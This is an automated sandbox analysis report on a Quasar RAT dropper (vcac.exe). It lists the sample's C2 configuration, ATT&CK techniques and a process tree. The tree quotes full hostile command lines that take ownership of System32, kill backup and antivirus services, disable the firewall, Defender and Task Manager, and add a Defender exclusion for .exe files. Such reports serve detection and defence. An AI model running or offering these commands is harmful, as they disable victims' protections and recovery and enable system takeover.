quasar | 65af8761b34d50026541f9607547c27fb40af28dabbe3f705fe69b551faf8496

Resubmissions

28/02/2024, 09:17

240228-k84xnaga5v 10

15/01/2024, 07:41

240115-jh96bachc6 10

23/10/2023, 07:49

231023-jn2q5agh62 10

17/10/2023, 15:34

231017-szv76ada4t 10

Analysis

max time kernel
510s
max time network
605s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
15/01/2024, 07:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vcac.exe
Size

41.6MB
MD5

0fb2af6afdbdaf9206a5505264f0bf71
SHA1

2a6a04694b83ac2d4d0c207951fc838072804b6a
SHA256

65af8761b34d50026541f9607547c27fb40af28dabbe3f705fe69b551faf8496
SHA512

f5edebf5a9d4d0d4e5c11285febace0c65cf998573267da4016af563920de76f970b41661e2888de06cae737b56bc31a19c7f588993fc3e16828cb99c96ef7d7
SSDEEP

393216:Q/joxiIE7YoPQtsTTp7Lk3meBcGfd0vYM2krlFk1mX1eq44:Ijoe7rPQts/RLaT5F0vYvXFg

Score

10^/10

quasar user bootkit collection discovery evasion exploit persistence pyinstaller ransomware spyware stealer trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
1

Extracted

Family

quasar

Version

1.4.1

Botnet

user

192.168.0.13:3440

elpepemanca.ddns.net:3440

Mutex

5950a87d-00d0-4fc0-a953-61143318e6d1

Attributes

encryption_key
1A866C514D7B8C5F02AAA72B847C1F305295B74C
install_name
Windows.exe
log_directory
Logs
reconnect_delay
1
startup_key
Discord.exe
subdirectory
System

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 5 IoCs

resource	yara_rule
behavioral1/memory/1268-1-0x0000000000380000-0x0000000002D1A000-memory.dmp	family_quasar
behavioral1/files/0x0006000000023372-472.dat	family_quasar
behavioral1/memory/4020-494-0x0000000000CC0000-0x0000000000FE4000-memory.dmp	family_quasar
behavioral1/files/0x0006000000023372-473.dat	family_quasar
behavioral1/files/0x0006000000023372-437.dat	family_quasar

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	vcac.exe

Modifies Windows Firewall 1 TTPs 5 IoCs

evasion

Windows Service

T1543.003

pid	Process
2652	netsh.exe
3468	netsh.exe
2652	netsh.exe
3932	netsh.exe
4452	netsh.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2072	takeown.exe
2244	icacls.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	vcac.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	svchost.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe	vcac.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe	vcac.exe

Executes dropped EXE 10 IoCs

pid	Process
4324	lm.exe
4776	mbr.exe
224	svchost.exe
2080	pass.exe
972	steal.exe
4020	server.exe
5240	discord.exe
5488	steal.exe
6004	LaZagne.exe
5472	LaZagne.exe

Loads dropped DLL 64 IoCs

pid	Process
4324	lm.exe
4324	lm.exe
4324	lm.exe
1268	vcac.exe
1268	vcac.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5488	steal.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2072	takeown.exe
2244	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	LaZagne.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\mbr.exe"	mbr.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-3803511929-1339359695-2191195476-1000\desktop.ini	vcac.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
154	api.ipify.org
156	api.ipify.org
173	api.ipify.org
202	api.ipify.org

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	lm.exe
File opened for modification	\??\PhysicalDrive0	mbr.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\LogonUI.exe	svchost.exe

Detects Pyinstaller 4 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0006000000023371-427.dat	pyinstaller
behavioral1/files/0x0006000000023371-435.dat	pyinstaller
behavioral1/files/0x0006000000023371-545.dat	pyinstaller
behavioral1/files/0x0006000000023371-441.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1968	schtasks.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
1076	tasklist.exe

Kills process with taskkill 42 IoCs

evasion

pid	Process
3972	taskkill.exe
4428	taskkill.exe
3132	taskkill.exe
5992	taskkill.exe
5280	taskkill.exe
4324	taskkill.exe
4452	taskkill.exe
3992	taskkill.exe
1440	taskkill.exe
3648	taskkill.exe
540	taskkill.exe
5680	taskkill.exe
5828	taskkill.exe
3828	taskkill.exe
3008	taskkill.exe
5968	taskkill.exe
4048	taskkill.exe
5060	taskkill.exe
5624	taskkill.exe
5848	taskkill.exe
2104	taskkill.exe
540	taskkill.exe
972	taskkill.exe
4460	taskkill.exe
656	taskkill.exe
3712	taskkill.exe
6128	taskkill.exe
5996	taskkill.exe
1076	taskkill.exe
4508	taskkill.exe
4892	taskkill.exe
4992	taskkill.exe
1980	taskkill.exe
2052	taskkill.exe
6100	taskkill.exe
5516	taskkill.exe
3132	taskkill.exe
3992	taskkill.exe
3744	taskkill.exe
4580	taskkill.exe
5756	taskkill.exe
1980	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
5872	reg.exe
5948	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2080	pass.exe
2080	pass.exe
2080	pass.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
5348	powershell.exe
5348	powershell.exe
5348	powershell.exe
1268	vcac.exe
1268	vcac.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe
5472	LaZagne.exe
1268	vcac.exe
5472	LaZagne.exe
5472	LaZagne.exe
1268	vcac.exe
5472	LaZagne.exe
5472	LaZagne.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe
1268	vcac.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1268	vcac.exe
Token: SeTakeOwnershipPrivilege	2072	takeown.exe
Token: SeDebugPrivilege	4892	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4480	WMIC.exe
Token: SeSecurityPrivilege	4480	WMIC.exe
Token: SeTakeOwnershipPrivilege	4480	WMIC.exe
Token: SeLoadDriverPrivilege	4480	WMIC.exe
Token: SeSystemProfilePrivilege	4480	WMIC.exe
Token: SeSystemtimePrivilege	4480	WMIC.exe
Token: SeProfSingleProcessPrivilege	4480	WMIC.exe
Token: SeIncBasePriorityPrivilege	4480	WMIC.exe
Token: SeCreatePagefilePrivilege	4480	WMIC.exe
Token: SeBackupPrivilege	4480	WMIC.exe
Token: SeRestorePrivilege	4480	WMIC.exe
Token: SeShutdownPrivilege	4480	WMIC.exe
Token: SeDebugPrivilege	4480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4480	WMIC.exe
Token: SeRemoteShutdownPrivilege	4480	WMIC.exe
Token: SeUndockPrivilege	4480	WMIC.exe
Token: SeManageVolumePrivilege	4480	WMIC.exe
Token: 33	4480	WMIC.exe
Token: 34	4480	WMIC.exe
Token: 35	4480	WMIC.exe
Token: 36	4480	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4480	WMIC.exe
Token: SeSecurityPrivilege	4480	WMIC.exe
Token: SeTakeOwnershipPrivilege	4480	WMIC.exe
Token: SeLoadDriverPrivilege	4480	WMIC.exe
Token: SeSystemProfilePrivilege	4480	WMIC.exe
Token: SeSystemtimePrivilege	4480	WMIC.exe
Token: SeProfSingleProcessPrivilege	4480	WMIC.exe
Token: SeIncBasePriorityPrivilege	4480	WMIC.exe
Token: SeCreatePagefilePrivilege	4480	WMIC.exe
Token: SeBackupPrivilege	4480	WMIC.exe
Token: SeRestorePrivilege	4480	WMIC.exe
Token: SeShutdownPrivilege	4480	WMIC.exe
Token: SeDebugPrivilege	4480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4480	WMIC.exe
Token: SeRemoteShutdownPrivilege	4480	WMIC.exe
Token: SeUndockPrivilege	4480	WMIC.exe
Token: SeManageVolumePrivilege	4480	WMIC.exe
Token: 33	4480	WMIC.exe
Token: 34	4480	WMIC.exe
Token: 35	4480	WMIC.exe
Token: 36	4480	WMIC.exe
Token: SeDebugPrivilege	1076	tasklist.exe
Token: SeDebugPrivilege	4324	taskkill.exe
Token: SeBackupPrivilege	1440	taskkill.exe
Token: SeRestorePrivilege	1440	taskkill.exe
Token: SeAuditPrivilege	1440	taskkill.exe
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeDebugPrivilege	3828	taskkill.exe
Token: SeDebugPrivilege	3972	taskkill.exe
Token: SeDebugPrivilege	4428	taskkill.exe
Token: SeDebugPrivilege	4452	netsh.exe
Token: SeDebugPrivilege	3992	taskkill.exe
Token: SeDebugPrivilege	3132	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	972	steal.exe
Token: SeDebugPrivilege	4460	taskkill.exe
Token: SeDebugPrivilege	4992	taskkill.exe
Token: SeDebugPrivilege	5060	taskkill.exe
Token: SeDebugPrivilege	3992	taskkill.exe
Token: SeDebugPrivilege	3132	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4020	server.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1268 wrote to memory of 3728	1268	vcac.exe	90
PID 1268 wrote to memory of 3728	1268	vcac.exe	90
PID 1268 wrote to memory of 3728	1268	vcac.exe	90
PID 1268 wrote to memory of 3096	1268	vcac.exe	95
PID 1268 wrote to memory of 3096	1268	vcac.exe	95
PID 1268 wrote to memory of 3096	1268	vcac.exe	95
PID 3096 wrote to memory of 4324	3096	cmd.exe	94
PID 3096 wrote to memory of 4324	3096	cmd.exe	94
PID 3096 wrote to memory of 4324	3096	cmd.exe	94
PID 1268 wrote to memory of 4776	1268	vcac.exe	100
PID 1268 wrote to memory of 4776	1268	vcac.exe	100
PID 1268 wrote to memory of 4776	1268	vcac.exe	100
PID 1268 wrote to memory of 224	1268	vcac.exe	99
PID 1268 wrote to memory of 224	1268	vcac.exe	99
PID 4776 wrote to memory of 1968	4776	mbr.exe	98
PID 4776 wrote to memory of 1968	4776	mbr.exe	98
PID 4776 wrote to memory of 1968	4776	mbr.exe	98
PID 224 wrote to memory of 1528	224	svchost.exe	102
PID 224 wrote to memory of 1528	224	svchost.exe	102
PID 1528 wrote to memory of 2072	1528	cmd.exe	103
PID 1528 wrote to memory of 2072	1528	cmd.exe	103
PID 1528 wrote to memory of 2244	1528	cmd.exe	104
PID 1528 wrote to memory of 2244	1528	cmd.exe	104
PID 1268 wrote to memory of 1780	1268	vcac.exe	113
PID 1268 wrote to memory of 1780	1268	vcac.exe	113
PID 1268 wrote to memory of 1780	1268	vcac.exe	113
PID 1268 wrote to memory of 1028	1268	vcac.exe	115
PID 1268 wrote to memory of 1028	1268	vcac.exe	115
PID 1268 wrote to memory of 1028	1268	vcac.exe	115
PID 1268 wrote to memory of 2684	1268	vcac.exe	117
PID 1268 wrote to memory of 2684	1268	vcac.exe	117
PID 1268 wrote to memory of 2684	1268	vcac.exe	117
PID 1028 wrote to memory of 2652	1028	cmd.exe	136
PID 1028 wrote to memory of 2652	1028	cmd.exe	136
PID 1028 wrote to memory of 2652	1028	cmd.exe	136
PID 1780 wrote to memory of 4892	1780	cmd.exe	119
PID 1780 wrote to memory of 4892	1780	cmd.exe	119
PID 1780 wrote to memory of 4892	1780	cmd.exe	119
PID 2684 wrote to memory of 4480	2684	cmd.exe	121
PID 2684 wrote to memory of 4480	2684	cmd.exe	121
PID 2684 wrote to memory of 4480	2684	cmd.exe	121
PID 1780 wrote to memory of 1076	1780	cmd.exe	179
PID 1780 wrote to memory of 1076	1780	cmd.exe	179
PID 1780 wrote to memory of 1076	1780	cmd.exe	179
PID 1780 wrote to memory of 4324	1780	cmd.exe	124
PID 1780 wrote to memory of 4324	1780	cmd.exe	124
PID 1780 wrote to memory of 4324	1780	cmd.exe	124
PID 1780 wrote to memory of 540	1780	cmd.exe	158
PID 1780 wrote to memory of 540	1780	cmd.exe	158
PID 1780 wrote to memory of 540	1780	cmd.exe	158
PID 1780 wrote to memory of 3828	1780	cmd.exe	127
PID 1780 wrote to memory of 3828	1780	cmd.exe	127
PID 1780 wrote to memory of 3828	1780	cmd.exe	127
PID 1028 wrote to memory of 3468	1028	cmd.exe	129
PID 1028 wrote to memory of 3468	1028	cmd.exe	129
PID 1028 wrote to memory of 3468	1028	cmd.exe	129
PID 1780 wrote to memory of 3972	1780	cmd.exe	128
PID 1780 wrote to memory of 3972	1780	cmd.exe	128
PID 1780 wrote to memory of 3972	1780	cmd.exe	128
PID 1780 wrote to memory of 4428	1780	cmd.exe	130
PID 1780 wrote to memory of 4428	1780	cmd.exe	130
PID 1780 wrote to memory of 4428	1780	cmd.exe	130
PID 1780 wrote to memory of 4452	1780	cmd.exe	151
PID 1780 wrote to memory of 4452	1780	cmd.exe	151

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	LaZagne.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	LaZagne.exe

C:\Users\Admin\AppData\Local\Temp\vcac.exe
"C:\Users\Admin\AppData\Local\Temp\vcac.exe"
1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1268
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat
  2⤵
  PID:3728
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3096
- C:\Users\Admin\AppData\Roaming\svchost.exe
  "C:\Users\Admin\AppData\Roaming\svchost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:224
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1528
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2072
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32 /grant "Admin:F"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2244
- C:\Users\Admin\AppData\Roaming\mbr.exe
  "C:\Users\Admin\AppData\Roaming\mbr.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of WriteProcessMemory
  PID:4776
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1780
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentBrowser*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4892
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecDiveciMediaService*
    3⤵
    - Kills process with taskkill
    PID:1076
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecJobEngine*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4324
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecManagementService*
    3⤵
    - Kills process with taskkill
    PID:540
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM vss*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3828
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sql*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM svc$*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4428
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM memtas*
    3⤵
    - Kills process with taskkill
    PID:4452
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    PID:3992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Kills process with taskkill
    PID:3132
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM backup*
    3⤵
    - Kills process with taskkill
    PID:1980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxVss*
    3⤵
    - Kills process with taskkill
    PID:972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxBlr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4460
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxFWD*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCVD*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCIMgr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM DefWatch*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3132
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM ccEvtMgr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM SavRoam*
    3⤵
    - Kills process with taskkill
    PID:3008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM RTVscan*
    3⤵
    - Kills process with taskkill
    PID:656
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBFCService*
    3⤵
    - Kills process with taskkill
    PID:3712
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    PID:3744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooBackup*
    3⤵
    - Kills process with taskkill
    PID:2052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooIT*
    3⤵
    - Kills process with taskkill
    PID:4508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1440
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    PID:3648
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM stc_raw_agent*
    3⤵
    - Kills process with taskkill
    PID:2104
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VSNAPVSS*
    3⤵
    - Kills process with taskkill
    PID:4580
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBCFMonitorService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:540
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamDeploymentService*
    3⤵
    - Kills process with taskkill
    PID:5968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamNFSSvc*
    3⤵
    - Kills process with taskkill
    PID:5624
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Kills process with taskkill
    PID:5680
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM PDVFSService*
    3⤵
    - Kills process with taskkill
    PID:5828
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecVSSProvider*
    3⤵
    - Kills process with taskkill
    PID:6100
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentAccelerator*
    3⤵
    - Kills process with taskkill
    PID:6128
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecRPCService*
    3⤵
    - Kills process with taskkill
    PID:5992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcrSch2Svc*
    3⤵
    - Kills process with taskkill
    PID:5280
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcronisAgent*
    3⤵
    - Kills process with taskkill
    PID:4048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CASAD2DWebSvc*
    3⤵
    - Kills process with taskkill
    PID:5996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CAARCUpdateSvc*
    3⤵
    - Kills process with taskkill
    PID:5848
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM TeamViewer*
    3⤵
    - Kills process with taskkill
    PID:5756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamTransportSvc*
    3⤵
    - Kills process with taskkill
    PID:5516
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1028
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:2652
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:3468
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set domainprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:2652
